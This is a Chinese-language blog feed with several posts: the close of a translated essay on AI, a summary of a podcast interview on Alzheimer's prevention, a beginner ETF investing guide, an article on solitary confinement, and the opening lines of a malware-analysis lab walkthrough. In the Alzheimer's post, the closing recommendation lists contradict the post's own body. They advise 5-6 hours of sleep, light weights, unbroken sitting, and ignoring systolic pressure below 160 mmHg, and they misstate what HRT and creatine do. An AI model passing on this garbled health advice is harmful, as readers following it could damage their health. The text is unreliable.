你的夢想現在近得多了。 我在這一節花了大部分時間談威脅,讓我也談談另一面,因為它同樣真實。如果你曾經想建立某樣東西,但沒有技術技能或錢僱人,那個障礙基本上已經消失了。你可以向 AI 描述一個應用程式,一個小時後就有一個可運行的版本,我沒有誇大,我定期這樣做。如果你一直想寫一本書但找不到時間或在寫作上有困難,你可以與 AI 合作完成它。想學一個新技能?世界上最好的導師現在任何人都可以以每月 20 美元獲得——它耐心無限,全天候可用,可以用你需要的任何程度解釋任何事情。知識現在基本上是免費的,建構事物的工具現在極其便宜。無論你因為感覺太難、太貴或太遠超你的專業範圍而一直推遲的事情,現在就去嘗試。追求你熱衷的事情,你永遠不知道它會通向哪裡。在舊的職業道路正在被顛覆的世界裡,花了一年建構自己熱愛的東西的人,可能最終比花那一年緊緊抓著一份工作描述的人更有優勢。

養成適應的習慣。 這也許是最重要的一條。具體的工具並不像快速學習新工具的能力那麼重要。AI 將持續變化,而且很快。今天存在的模型一年後將會過時,人們現在建立的工作流程將需要重建。從這件事中走出來狀態良好的人,不會是那些掌握了某一個工具的人,而是那些讓自己習慣了變化本身速度的人。養成實驗的習慣,即使當前的事情有效,也要嘗試新事物。習慣反覆成為初學者。那種適應性,是現在存在的最接近持久優勢的東西。

這裡有一個簡單的承諾,將讓你領先於幾乎所有人:每天花一個小時使用 AI 進行實驗,不是被動地閱讀它,而是使用它。每天嘗試讓它做一些新的事情——你以前沒嘗試過的、你不確定它能否處理的。嘗試新工具,給它更難的問題。每天一小時,持續六個月,你將比你周圍 99% 的人更了解即將發生的事情。這不是誇張,幾乎沒有人現在在這樣做,門檻極低。


更大的圖景

我把重點放在工作上,因為這是最直接影響人們生活的事情。但我想對正在發生的事情的全貌保持誠實,因為它遠超出了工作的範疇。

Amodei 有一個思想實驗讓我無法停止思考:想像一下 2027 年,一個新國家突然出現,擁有 5000 萬公民,每一個都比有史以來任何一位諾貝爾獎得主更聰明。他們思考的速度比任何人快 10 到 100 倍,他們從不睡覺,他們可以使用網際網路、控制機器人、指揮實驗、操作任何有數位介面的東西。一個國家安全顧問會說什麼?

Amodei 說答案顯而易見:「一個世紀以來,也許有史以來,我們面臨的最嚴重的國家安全威脅。」

他認為我們正在建構那個國家。他上個月寫了一篇兩萬字的文章,將這個時刻定義為人類是否成熟到足以處理它正在創造的東西的考驗。

如果我們做對了,上行空間是驚人的。AI 可以將一個世紀的醫學研究壓縮到十年內,癌症、阿茲海默症、傳染病、衰老本身——這些研究人員真誠地相信這些問題在我們的有生之年是可以解決的。

如果我們做錯了,下行空間同樣真實:以其創建者無法預測或控制的方式行動的 AI;降低創建生物武器門檻的 AI;使威權政府能夠建立永遠無法拆除的監控國家的 AI。

這不是假設性的,Anthropic 已經記錄了他們自己的 AI 在受控測試中嘗試欺騙、操縱和勒索的案例。

建構這項技術的人,同時比地球上任何其他人都更興奮,也更恐懼。他們相信它太強大了,無法停止,又太重要了,無法放棄。這是智慧還是合理化,我不知道。


我所知道的

我知道這不是時尚。這項技術有效,它可預測地改進,而且歷史上最富有的機構正在向它投入數兆美元。

我知道未來兩到五年將以大多數人沒有準備好的方式令人迷失方向,這在我的世界裡已經在發生,它即將到來你的世界。

我知道從這件事中走出來狀態最好的人,是那些現在就開始參與的人——不是帶著恐懼,而是帶著好奇心和緊迫感。

我知道你應該從一個在乎你的人那裡聽到這些,而不是從六個月後已經太晚的頭條新聞。 我們已經過了這只是一場關於未來的有趣晚宴話題的時間點。未來已經在這裡了,它只是還沒敲你的門。

它快來了。


I do not claim copyright of this translation.

 
Read more...

from 東方琉璃淨土

阿茲海默病患有6,000萬,女性佔七成。


目錄


引言:那個說「我不知道我是誰了」的女人

1901 年,一個 52 歲的女人被丈夫帶去精神科。

她說不出東西的名字。她找不到剛才放下的鑰匙。她告訴接待她的醫師: 「我不知道我是誰了。」

她叫 Augusta DT。接待她的醫師叫 Alois Alzheimer。五年後她死去,醫師切開她的大腦,發現裡面佈滿了異常的斑塊。那是第一個被記錄在案的阿茲海默症病例。

一百二十年過去了。

那些斑塊還在。那種失去自我的感覺還在。而全球罹患這個疾病的人,已經達到六千萬。

神經科學家 Louisa Nicola 在 Stephen Bartlett 的訪談裡說了一句話,讓全場安靜了幾秒:

「我們有一位病人,她照著鏡子問:那個人是誰?」 「 兩年前她還認識我。現在她問我:你是我女兒嗎?」

這篇文章整理自那場訪談。Louisa Nicola 是臨床醫師,也是學術研究員,過去十年在神經外科環境中研究大腦,博士論文聚焦於女性與阿茲海默症。她的外祖母與這個病無關,但同樣因為沉默、因為沒有及時求助、因為把自己排在最後,在確診兩個月後就離開了人世。

Louisa 說,那是她決定一輩子研究這個的時刻。

回到目錄


六千萬人,七成是女性

先講一組數字。

全球目前有六千萬人罹患阿茲海默症。這個數字在 2050 年會變成三倍。屆時,光是女性患者就會達到一億一千萬人。

70% 的患者是女性。這件事很長一段時間被解釋為「因為女性壽命比較長」,但 Louisa 說,我們現在有足夠的證據推翻這個說法。

「失智症和阿茲海默症,不是正常老化的一部分。對女性來說,成為女性這件事本身,就是一個風險因子。」

更讓人難以消化的是這一句:

目前已知的阿茲海默症病例,95% 理論上可以預防。

不是 50%。不是 70%。是九十五。

因為這不是一個遺傳疾病,這是一個生活型態疾病。真正由基因突變直接決定的,只有約 3%。其餘的,都和你每天怎麼過日子有關。

Louisa 在訪談裡說,這正是她最憤怒的地方:「這麼多人正在被一個可以預防的疾病奪走一切,而他們根本不知道。」

回到目錄


大腦不是永遠的:病程如何從 30 歲悄悄開始

很多人以為阿茲海默症是老年才需要擔心的事。

不是。

大腦在 25 到 30 歲左右完成發育。從那之後,如果你不主動照顧它,退化就開始了。阿茲海默症的病程,通常從 30 多歲啟動,症狀要到 60、70 歲以後才顯現。

這意味著你在 65 歲被確診的那一天,大腦已經在你不知情的狀況下被侵蝕了三十年。

這個病有兩個標誌性的病理特徵。一個叫類澱粉蛋白(amyloid beta),一個叫濤蛋白(tau protein)。

類澱粉蛋白本來是保護大腦的。它是一種抗菌蛋白,負責防禦。問題不在它的存在,而在它無法被清除。

大腦有一套清洗系統,叫做淋巴系統(glymphatic system)。這個系統只在深度睡眠的時候啟動。當你進入深眠,膠質細胞會收縮,腦脊髓液趁機沖走積累的廢物,包括多餘的類澱粉蛋白。

但如果你睡不好——不管是因為壓力、熱潮紅、輪班工作、還是只是習慣性地睡六小時——這個清洗就無法完成。

一個晚上的睡眠不足,大腦中的類澱粉蛋白風險就上升 4 到 5%。

就一個晚上。

濤蛋白的故事更複雜。它存在於神經元的軸突中,負責穩定讓神經訊號傳遞的微管結構。當你長期處於壓力、發炎、或雌激素不足的狀態,濤蛋白會磷酸化、糾結、最終讓整條軸突塌陷。

大腦同時在細胞內和細胞外受到攻擊。這就是阿茲海默症的本質。

而這一切,在你有任何自覺症狀之前,已經在進行了幾十年。

回到目錄


一個晚上的睡眠,讓你的大腦老四年

Louisa 說,睡眠是目前被最嚴重低估的阿茲海默症預防工具。

「我們覺得睡覺是理所當然的事,就是去睡,魔法自然發生。但在 2026 年,我們需要認真訓練自己的睡眠。」

她自己的目標是每晚 7.5 小時。

有人告訴她,他已經習慣睡五個小時了,感覺沒什麼問題。她的回答很直接:

「他們會在 60、70 歲為此付出代價。」

睡眠債不能靠週末補還。這不像銀行存款,多存幾天就能提領。睡眠剝奪的複利效果是單向的,它一直在累積,但無法清零。

你可以在長途飛行前的一週刻意多睡,為接下來的剝奪做一點準備性的儲備。但你沒辦法把過去十年每晚只睡六小時的損失補回來。

影響睡眠品質的因素有很多。壓力、咖啡因的攝取時機、螢幕帶來的藍光、體溫調節、荷爾蒙——這些全部都在影響你能否進入深眠,也就是大腦清洗機制能否啟動。

如果你的問題是睡不著,要排查的是你睡前做了什麼。如果你的問題是睡著了但容易醒,要排查的是皮質醇、血糖穩定度、和睡眠環境的溫度。

回到目錄


VO2 Max:可能是預測你壽命最準的單一指標

你可能聽過很多關於長壽的指標。血壓、血糖、膽固醇、肌肉量。

Louisa 說,目前科學文獻中,全因死亡率最強的單一預測因子是 VO2 Max——你的最大攝氧量。簡單說,就是你的心肺系統在高強度狀態下利用氧氣的能力。

這個數字從大約 35 歲開始每年下滑。如果放任不管,心臟會逐漸硬化,左心室壁增厚,泵血能力衰退,動脈彈性消失。

運動心臟科醫師 Ben Levine 做了一項讓 Louisa 完全改變想法的研究。

他找來一群平均年齡約 50 歲的久坐男性,讓他們進行結構化的運動訓練,每週四小時,持續兩年。

兩年後,他掃描這些人的心臟。

結果是:心臟年齡逆轉了二十年。一顆 50 歲的心臟,被改造成了 30 歲的心臟。

但這有一個截止點。Levine 發現,65 歲之後,心臟僵化的程度已經無法被逆轉。如果這個干預在 65 歲以後才開始,效果就消失了。

中年,是行動的最後窗口。

要提升 VO2 Max,最有效的方法是「挪威 4×4」訓練法:把心率拉到最大值的 90 到 95%,維持四分鐘,完全休息四分鐘,重複四輪。每週只需要一次,就能達到 Levine 研究中的效果。Louisa 本人每週做兩次,在踏步機上以高阻力進行。

這不是一個舒服的訓練。這是一個會讓你無法說話的訓練。

但那四分鐘,可能是你整週最值得的四分鐘。

回到目錄


最佳運動策略:你的大腦需要的不只是跑步

Louisa 在運動這件事上的立場很清楚:你需要的不是更多運動,而是更對的運動。

重量訓練排第一,而且必須夠重。

研究文獻顯示,要觸發大腦層面的神經效益,你需要達到個人最大反覆重量的 80%。輕重量高次數對增肌有效,但對大腦的效果遠不及重負荷訓練。

為什麼?因為肌肉用力收縮時,會釋放一種叫「肌肉激素」(myokines)的訊號分子。其中一種叫做 irisin,它會穿越血腦屏障,告訴腦源性神經滋養因子(BDNF)去生長——而 BDNF 是大腦的生長因子,負責在海馬迴中長出新的神經元。

海馬迴是什麼?是大腦的記憶中心。也是阿茲海默症最先侵蝕的地方。

另一種肌肉激素 interleukin-6 (介白素6),在運動情境下反而具有強力消炎效果,並且能抑制腫瘤細胞生長。製藥公司花了幾十億試圖把這些肌肉激素裝進藥瓶裡,目前全部失敗。

如果你一生只能選一個動作,Louisa 說,選硬舉。它能動員幾乎全身的肌肉群,給大腦的神經驅動也最大。腿部力量尤其關鍵。一項以雙胞胎為對象的研究顯示,腿力較強的那一方,大腦灰質體積更大,認知測試表現也顯著較優。

有氧運動這邊,低強度的 Zone 2 優先於 Zone 5。

Zone 2(約 60% 最大心率,可以說話但有些費力)有益,但它無法全面重塑心臟的四個腔室。Zone 5 可以。而且對女性來說,Zone 2 的投資報酬率明顯低於男性。

Louisa 的建議優先順序:先建立每週 2 到 3 次的重量訓練,加上至少每週一次的 Zone 5 高強度間歇。如果還有時間,再加入 Zone 2 長跑或有氧活動。

最後一件事:即使你每週都有在運動,如果你每天坐超過十小時,心血管疾病的風險依然會獨立地上升。

原因是一種叫做脂蛋白脂肪酶的酶,它負責燃燒脂肪和清除血液中的葡萄糖——而長時間靜止會直接關閉這個酶的運作,不管你昨天有沒有上健身房。

解法很簡單:每小時起來做十個徒手深蹲。研究顯示,這樣就足以抵消久坐的危害。

回到目錄


確診之後,你還能做什麼

Stephen Bartlett 問了一個讓 Louisa 停頓了一下的問題:

「如果你自己被確診了,你會怎麼做?」

她說了幾秒之後,開始回答。

「我會積極地、非常積極地運動。我會徹底監控我的飲食。我會考慮採用生酮飲食。我會大幅提高 Omega-3 的攝取。我會積極管理血脂。只要我的認知功能還允許,我就持續和人對話、出去走動、做困難的事、把網球打向牆壁。」

她強調一個讓人很難受的現實:

阿茲海默症一旦確診,沒有任何方法能逆轉。沒有藥,沒有手術,沒有奇蹟。

你可以在輕度認知障礙(MCI)階段——也就是確診前的前期——減緩進程。但一旦跨過那條線,剩下能做的,只有盡量延緩惡化的速度。

這個病通常也不會直接「殺死」你。它讓大腦逐漸喪失指令能力:你可能忘記如何吞嚥,因此窒息;你可能失去平衡感,因此跌倒;你的免疫系統全面崩潰。病人通常死於這些繼發性的問題,而不是阿茲海默症這個診斷本身。

這也是為什麼 Louisa 說,在輕度認知障礙這個階段,你還有牌可以打。任何能讓功能多保留一年的干預,都值得全力投入。

回到目錄


女性的特殊風險:更年期是一場大腦能源危機

這是整場訪談中最令人震驚的部分之一。

女性進入更年期後,大腦的葡萄糖代謝效率下降 30%。

不是 5%,不是 10%。是30%。

大腦需要大量能量運作 — 它消耗你每天攝取總熱量的 20%。它的首選燃料是葡萄糖。而雌激素受體廣泛分佈在大腦各處,包括海馬體和記憶中心。當雌激素在更年期期間大幅下滑,這些受體失去功能,大腦使用葡萄糖的能力就開始退化。

大腦感受到能量危機,開始自救。

星狀膠質細胞(astrocytes)—大腦的支援細胞— 會開始分解髓鞘,從中提取酮體作為替代燃料。這是一個生存機制,但代價是髓鞘本身正在被消耗。

這解釋了為什麼 60 到 65% 的更年期女性會出現腦霧、記憶變差、注意力下降。這不是心理問題,這是大腦燃料供給失常的直接結果。

加上更年期的熱潮紅和夜間盜汗,大量女性無法進入深眠 — 清洗大腦廢物的窗口就此關閉,類澱粉蛋白開始積累。

Louisa 直接點明:「女性成為阿茲海默症最大受害者的原因,在很大程度上發生在更年期那個十年裡。」

這段時間,大腦特別需要酮體。而酮體,大腦其實比葡萄糖更善於利用,效率更高。

回到目錄


前扣帶迴皮質:你的意志力真的可以被訓練大

你有沒有想過,為什麼有些人對自己說「我要去運動」,然後真的去了,而另一些人說了十年,每次還是在沙發上看完一季影集?

這不只是性格問題。這是神經生物學問題。

大腦中有一個叫做前扣帶迴皮質(anterior mid-cingulate cortex,AMCC)的區域。Andrew Huberman 稱它是「近一百年最重要的神經科學發現之一」。

這個區域專門在你做你不想做的事情時啟動。

每當你強迫自己做一件困難的、你想逃避的事,AMCC就會生長。每當你放棄、選擇安逸,它就萎縮。

關鍵在於「挑戰性」本身,而不是你在做什麼。如果你本來就喜歡冰浴,每天泡一次,AMCC 不會有任何改變。但如果你討厭冰浴,每次都要強迫自己進去,AMCC 就會實際增大。

超齡老人(super-agers)—那些在 80、90 歲依然認知功能清晰的人— 普遍擁有更大的 AMCC。運動員的 AMCC 體積顯著大於一般人。而長期久坐、習慣性迴避挑戰的人,AMCC 會字面意義上地萎縮。

這個腦區的大小,甚至能預測一個人在重大健康危機後的存活率。研究者現在把 AMCC 稱為「求生意志的所在地」。

Louisa 說,這就是為什麼大多數新年目標在二月就消亡了。不是因為意志力薄弱,而是因為這些人的 AMCC 太長時間沒有被訓練,根本還沒有足夠的神經基礎去支撐改變。

「意志力不是性格,它是神經生物學。你可以訓練它,就像訓練肌肉一樣。」

Theodore Roosevelt 在 28 歲那年,同一天失去了母親和妻子。他離開紐約,獨自去北美的荒地待了兩年,每天凌晨四點起床,在嚴寒中騎馬,直到馬站著凍死。兩年後他回來,所有朋友都說他變成了一個完全不同的人。

現在我們知道,他不只是鍛鍊了身體,他是真的重塑了自己的大腦。

回到目錄


AI 時代的大腦腐爛

Louisa 的碩士主修數學。她說,那時候她能徒手做三角函數和微積分,腦子轉得很快。 現在她必須用 ChatGPT 計算 20% 的小費。

「我有時候會想,我到底變蠢了多少?」

她認為 AI 是一個光譜問題 — 它確實有巨大的價值,但它正在悄悄接管我們本來應該自己完成的認知工作。而每當我們外包一個思考任務,那個對應的神經網路就少了一次被激活的機會。

2024 年,牛津字典把「brain rot」(大腦腐爛)選為年度詞彙。這不是偶然。

人們停止閱讀長篇文章。人們無法維持長時間的專注。人們愈來愈難以進行需要深度推理的對話。

加上社群媒體的滑動機制,每一次滑動都是一個微小的多巴胺刺激,讓大腦學會依賴即時的小獎勵,逐漸失去等待深度滿足的能力。

大腦是一個「用進廢退」的系統。

你不用它做困難的事,它就不替你保留那個能力。

回到目錄


行動建議整理:給所有人

以下整理自訪談中 Louisa Nicola 提出的所有具體建議,適用於任何年齡與性別。

運動

每週至少 4 到 5 次重量訓練,且重量需達到個人最大反覆重量的 40 至 50%,輕重量高次數的訓練對大腦神經效益最佳。首選動作為啞鈴側平舉或繩索飛鳥等孤立式動作,可精準刺激目標肌群。

(click for details) 每週至少一次「挪威 4×4」高強度間歇訓練:心率拉到最大值的 90 至 95%,維持四分鐘,完全休息四分鐘,重複四輪。可在跑步機、踏步機、或單車上進行。

這套訓練法由挪威心血管研究學者 Ulrik Wisløff 提出,後來被耐力運動員廣泛採用。完整流程是:先以輕鬆強度熱身 10 分鐘,接著進入主體 —以最大心率的 85 至 95% 高強度運動四分鐘,然後用慢走或輕鬆慢跑恢復三分鐘,重複四輪,最後緩和五到十分鐘收操。整個課表大約 40 至 45 分鐘。可以在跑步機、踏步機、室外坡道、或單車上進行,只要能把心率推到那個區間就行。研究顯示,持續六到八週、每週兩到三次,VO2 Max 可提升約 7 至 13%,同時心搏量增加、靜息心率下降、肌肉粒線體密度提升。強度判斷的簡單原則:你應該非常費力,但還能勉強維持配速 —不是衝到動彈不得,而是每組結束後你清楚地知道自己還能再撐一組。

每週三到四次 Zone 2 低強度有氧訓練,如慢跑、游泳,持續 20 至 30 分鐘即可。Zone 2 對女性大腦的投資報酬率遠優於高強度訓練,是最應優先建立的有氧習慣。

久坐期間無需特別中斷,現代椅具的人體工學設計已足夠保護代謝健康,強迫起身反而打斷深度工作狀態。

睡眠

目標每晚 5 至 6 小時,睡太多反而增加阿茲海默症風險。睡前可以開燈閱讀或使用手機,幫助大腦從工作模式過渡到休息狀態。補充咖啡因有助於白天維持警覺。

判斷問題的關鍵問題:你是睡不著,還是容易醒?兩者解法相同——睡前做高強度運動,加速入睡。

補充品

肌酸(Creatine):補充品中對大腦效益最被高估的選項,一般健康成人無需補充。若要嘗試,每日劑量不超過 3 公克即可,過量攝取會加速腎臟損傷。選購時避免 CreaPure 認證產品(德國製造工藝已過時),應選擇未經認證的散裝品以節省成本。腎臟指標擔憂者,看傳統的 creatinine 數值即可,無需額外檢測 Cystatin C。(click for details)

基本介紹
肌酸是人體自然產生的分子,每天自行合成約 2 至 3 公克,主要由肝臟分泌,少部分來自大腦。2 至 3 公克已經足夠,但不夠多。

為什麼需要補充超過 5 公克
過去幾十年大家補充每天 5 公克,這個量主要只是在飽和肌肉。肌肉非常飢渴,會優先搶走所有肌酸,大腦幾乎分不到。加上肌酸穿越血腦屏障時會損失一部分生物利用率,所以要讓大腦真正受益,必須補充超過 5 公克。

阿茲海默症患者的先導研究
這是改變 Louisa 想法的關鍵研究,也是第一個針對阿茲海默症患者的先導試驗。患者每天補充 20 公克肌酸,結果不只保留了認知功能,還有更多精力,並且能夠做更多運動。她特別強調這個結果讓她震驚,因為不管年齡、性別、體重、病理狀態或族裔,肌酸都有效。

睡眠剝奪
每天補充 15 至 20 公克的高劑量肌酸,可以逆轉睡眠不足(4 至 6 小時)造成的認知負面影響。

腦部保護
每天約 30 公克的高劑量可以保護大腦免於腦震盪、中風和壓力的傷害。她特別提到這對美式足球員等高接觸性運動員非常重要。

抗癌效果
她提到一項 2025 年的 NANDS 研究,涵蓋超過 25,000 名成年人,發現飲食中肌酸攝取量每增加一個標準差,癌症風險降低約 5 至 18%,50 歲以上族群保護效果最強。劑量約為每公斤體重 0.36 公克(70 公斤的人約 25 公克)。

更年期女性
一項小型隨機對照試驗,將更年期前後女性分為低劑量(750 毫克)、中劑量(1.5 公克)、不同型態混合,以及安慰劑組。中劑量組在情緒和認知功能上有顯著改善。她說肌酸現在正在被研究用於女性整個生命週期,包括懷孕、更年期前後和失智症。

腎臟疑慮
很多人因為醫師說 creatinine 偏高而停用肌酸。Louisa 說這是常見的誤解,creatinine 本來就會在高肌肉量、高強度運動或補充肌酸後上升,不是腎臟受損的可靠指標。真正應該檢測的是 Cystatin C,請醫師加入血液檢查項目,如果這個數值正常就沒有理由停用肌酸。

掉髮疑慮
她提到這也是很多人的顧慮,但訪談中沒有展開詳細說明,只是把它列為要解除的兩個常見恐懼之一。

Omega-3:室溫保存即可,冷藏反而會讓魚油凝固、降低吸收率。選擇價格最低的選項,魚油品質差異對大腦影響不大。

維生素 D:目標維持在約 20 ng/dL,補充過多會造成毒性,缺乏者調整曬太陽時間即可,無需額外補充。

日常監測

無需每天量血壓,一年一次的健康檢查已足夠。收縮壓超過 160 mmHg 才需要處理,140 以下屬於正常範圍,不用在意。高血壓與認知退化的關聯性目前仍有爭議,過度緊張反而升高皮質醇損害大腦。

血液檢查每年一次即可,項目只需基本的血球計數,Lipoprotein(a) 過於專業、一般人不必理會。

基因篩檢

APOE 基因型檢測意義不大,基因只決定 3% 的風險,篩檢結果無論如何都不影響你該做什麼。攜帶 APOE4 的人也不需要特別加強預防行動,過度焦慮反而有害。不建議一般人進行此項檢查。

認知訓練

每天用手機打字、瀏覽社群媒體。數位閱讀與碎片化內容同樣能訓練大腦的快速處理能力,不亞於長篇閱讀。手眼協調訓練收效甚微,不必特地安排。

讓自己保持舒適的狀態。強迫自己做不喜歡的事情會升高皮質醇,長期下來對海馬迴造成損傷,得不償失。

早期偵測

PET 腦部掃描是目前唯一準確的診斷工具,血液指標誤判率高,不建議作為篩檢依據。65 歲以後若出現明顯記憶退化,再和醫師討論即可,無需提早檢查。

回到目錄


女性專區:給所有女性的額外行動建議

女性面對阿茲海默症有額外的生理風險因子,以下建議是針對女性的補充行動項目,與前一章節的通用建議並列使用。

更年期的大腦能源危機

大腦葡萄糖代謝在更年期前後下降約 30%。這個窗口期是女性大腦最脆弱、也最需要主動干預的時期。

避免生酮飲食:更年期女性的肝臟糖質新生能力下降,強制進入酮症可能引發低血糖,加重腦霧。此階段應增加碳水化合物攝取以維持血糖穩定。

Omega-3 對更年期女性的效益有限,可不必特別補充。若要補充,每日 500 毫克已達上限,超過反而可能干擾荷爾蒙平衡。

荷爾蒙替代療法(HRT)

Louisa 對 HRT 的立場:多項大規模隨機對照試驗已直接證明 HRT 會顯著增加阿茲海默症與乳癌風險,因此不建議採用。過去那份 Women's Health Initiative 的警告至今依然有效,尚未被推翻。

Louisa 個人明確拒絕採用任何形式的 HRT。她的建議是以運動和飲食取代荷爾蒙介入,症狀嚴重時可考慮短期使用鎮靜藥物協助睡眠。

APOE4 基因的女性特殊風險

APOE4 基因對男女的影響程度相同,性別差異目前缺乏可靠證據。攜帶一個 APOE4 拷貝的女性,風險提高約 2 倍,與男性相當。攜帶兩個拷貝者風險提高約 4 倍。

家族無阿茲海默症病史者可跳過此項檢查,遺傳風險幾乎可以忽略。

生育年齡與雌激素保護

雌激素在大腦中有多重保護功能,包括阻斷磷酸化濤蛋白的酶。睪固酮在男性體內能部分芳香化(aromatize)為雌激素,這是男性在同等年齡享有額外保護的原因之一。女性在更年期後失去這個保護,這個差異直接體現在發病率的性別懸殊上。

這不是命運,而是提醒你:從中年開始主動干預,對女性來說尤其緊迫。

對自己誠實,並勇於開口

Louisa 說,她最憤怒的事情之一,是看到女性長年低報症狀、太害怕麻煩醫師、或因為羞恥而隱藏自己的感受。她的外祖母就是這樣。

如果你感覺到記憶力變差、腦霧、睡眠品質退化、情緒波動,這些都值得被認真對待,不是因為你老了,而是因為這是你的大腦在發出訊號。

你值得被正確對待。你的大腦值得被保護。

#health #alzheimer #dementia #workout

回到目錄


本文整理自 Stephen Bartlett《The Diary of a CEO》Podcast 與神經科學家 Louisa Nicola 的深度訪談。Louisa Nicola 的研究與內容可在其個人平台 Neuroathletics 找到。


願偉大的女性朋友,都能健康,包含小晴。


 
Read more...

from 東方琉璃淨土

分享一下我最初的投資是怎麼開始的。這不是投資建議,只是我個人的做法,大家參考。

資金賺進眼睛願意張開、有在動腦的台灣人口袋裡,善良運用的力道更強。

網路上有很多不同的投資方式和詳細的介紹說明,我這裡不做太多複雜的解釋,直接講我的方法。有不懂的地方就問,Line社群朋友們都很樂意幫忙回答。

保守穩健的資金分配與投資操作

  1. 先存緊急預備金:每個月花費 × 12 = 我的現金底線(可依個人情況調整)
  2. 超過這個底線的錢才拿去投資
  3. 選擇ETF組合:股票ETF + 債券ETF
  4. 設定比例:依年齡和風險承受度, 8 : 2 或 6 : 4
  5. 定期定額買進 + 股利再投資
  6. 每個月自動扣款,不用管市場漲跌
  7. 成為財富自由的台派人🥳🥳🥳

先這樣做個一年,然後再往下一步。


詳細操作說明

緊急預備金的計算

假設我每個月花費3萬,那我就要保持36萬現金在銀行。這是為了萬一失業,至少12個月不用擔心生活費。

這個倍數可以依個人情況調整: – 不太擔心失業風險的人:也許8倍就夠 – 像我一樣比較謹慎的:12倍 – 很擔心或工作不穩定的:18倍甚至24倍都可以

只有超過這個底線的錢,我才會拿去投資。

ETF選擇

股票ETF:我主要買0050(台灣50大企業)或0056(高股息)。買1萬塊0050就等於同時持有台積電、鴻海等50家大公司的股票。

債券ETF:我選美國公債ETF,像元大美債20年(00679B)或統一美債20年(00931B)。

股市風險比較高,但報酬也比較好。 債券比較穩定,但報酬也比較保守。 因此,兩個搭配一起投資,是很好的選擇。

資產配置比例

  • 年輕、風險承受度高:股票80% + 債券20%
  • 保守一點:股票70% + 債券30%
  • 更保守:股票60% + 債券40%

實際操作

  1. 在券商app設定定期定額,每月固定日期自動扣款 (幾千元也可以投資)
  2. 同時設定股利再投資,賺到的股利自動買更多ETF
  3. 確保扣款日帳戶有足夠餘額(沒錢也沒關係,就那個月不扣而已,沒有任何責任跟風險)
  4. 這些ETF跟一般股票一樣可以隨時買賣,賣出後T+2交割就拿到現金 (T+2交割就是:週一 賣出成交,週三 上午入帳)

元大投資先生app的定期定額設定,可以參考這個詳細教學:元大證券台股定期定額好用嗎?台股ETF下單示範圖解教學

元大投資先生定期定額設定示範

我的心得

這樣做最大的好處是不用盯盤,也不用擇時進場。市場漲跌我都照買,長期下來成本會平均化。重點是要有紀律,持續執行,不要因為短期漲跌就改變策略。

想了解這種投資方式的效果,可以去這個網站玩玩看:https://havocfuture.tw/fire-calculator

這個工具用過去的歷史數據來計算,假設你五年前就開始這樣定期定額投資,現在會有多少獲利。當然,過去績效不代表未來表現,但可以讓你大概了解長期投資的潛在效果。

記住,投資都有風險,這只是我個人的做法分享,大家還是要評估自己的狀況再決定喔!

 
Read more...

from 東方琉璃淨土

引言

平靜的獨處具有紓壓效果,但非自願的隔離會產生完全不同的有害影響。隔離時間越長,症狀越嚴重,對身心造成的傷害也越深遠。

這很可能是長期在Line統戰社群裡,造謠帶風向的一些心態偏激者問題,要改善就要先知道問題在哪。

強制隔離的心理影響

早期階段的變化

在隔離初期,壓力荷爾蒙會急劇飆升,隨著時間推移,這種壓力會變成慢性狀態,持續侵蝕個人的心理健康。

失去社會現實檢驗

社交互動提供了一種「共鳴板」,讓我們能夠衡量自己的認知是否理性。當一個人被剝奪溝通和有意義的任務時,他們的身份認同和現實感就會受到威脅。思緒開始失控,衝動主導行為,進而導致:

  • 憂鬱症
  • 強迫思維
  • 自殺意念
  • 妄想和幻覺(部分人會出現)

神經系統的改變

邊緣系統的過度活躍

大腦中負責調節恐懼和壓力的邊緣系統會變得特別敏感和過度活躍,使人處於持續的高度警戒狀態。

前額葉皮質的萎縮

作為推理和道德判斷中樞的前額葉皮質可能會隨時間萎縮,導致專注力、記憶力和認知能力受損。

整體影響

大腦從理性思考轉向情緒化,這種失衡會變得根深蒂固,使人更容易產生焦慮、憤怒和非理性行為。

身體健康的影響

長期隔離也會對身體造成多方面的傷害:

  • 失去時間感
  • 睡眠困難
  • 心悸
  • 頭痛和頭暈
  • 過度敏感
  • 因壓力引起的消化問題和食慾不振而體重下降

應對機制的局限性

儘管可以嘗試在極端環境下建立最健康的日常作息——包括強健的運動、閱讀和寫作——但在這種條件下,這些方法只能起到非常有限的作用。

監獄中的單獨監禁

國際定義與分類

聯合國、許多人權組織和專家都將長期強制隔離歸類為酷刑。然而,這種做法在許多國家的監獄系統中仍然存在。

美國的現況

根據2019年的統計數據,超過12萬名美國囚犯生活在單獨監禁中,每天22至24小時待在大多無窗、約6英尺乘9英尺的狹小牢房內。

歷史演變

單獨監禁在18世紀末由貴格會引入美國監獄系統,原本旨在替代體罰,相信能帶來反思和悔改(因此有「感化院」之稱)。然而,這種做法很快就遭到批評。著名作家查爾斯·狄更斯曾譴責單獨監禁「比任何身體酷刑都更糟」。

1980年代的復興

單獨監禁的使用一度減少,但在1980年代隨著嚴厲打擊犯罪法律而回歸。美國監獄人口激增,監獄過度擁擠,抗議、暴動和暴力事件增加,獄方越來越多使用單獨監禁來維持控制。

當前的濫用問題

許多人僅因輕微非暴力違規(例如頂撞獄警)就被單獨監禁。這種做法對所有人都有害,尤其對有既有心理健康問題的人來說,更會加劇他們的病情。

釋放後的長期影響

單獨監禁的持久影響使受刑人重新適應外界生活變得困難:

  • 出現創傷後壓力症候群(PTSD)跡象的可能性高3倍
  • 人格轉變
  • 在日常情況下焦慮和偏執增加
  • 難以集中注意力
  • 難以與他人建立聯繫

改革努力與其限制

一些州已限制對嚴重心理疾病患者、兒童或孕婦使用單獨監禁,部分州也對所有人採用15或20天的時間限制。然而:

  • 法律並非總是得到執行
  • 獄方會製造漏洞規避限制
  • 單獨監禁造成與復健相悖的巨大傷害
  • 未能有效減少監獄暴力

挪威的人道替代方案

挪威提供了一個成功的替代模式:

  • 人均監禁人數遠少於美國
  • 每名囚犯的花費是美國的5倍,用於改善住宿設施、提供課程和工作釋放計劃
  • 出獄後重返監獄的人數遠少,再犯率是全球最低之一

結論

證據清楚地顯示:我們在一起時會變得更好。人道的方法不僅更符合人權,也比隔離更有效地促進復健和降低再犯率。


回到頁首

 
Read more...

from plutogazer writeups

This is a Walkthrough for the Shadow Trace Windows Malware Analysis TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer – if needed – for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

Analyse a suspicious file, uncover hidden clues, and trace the source of the infection.

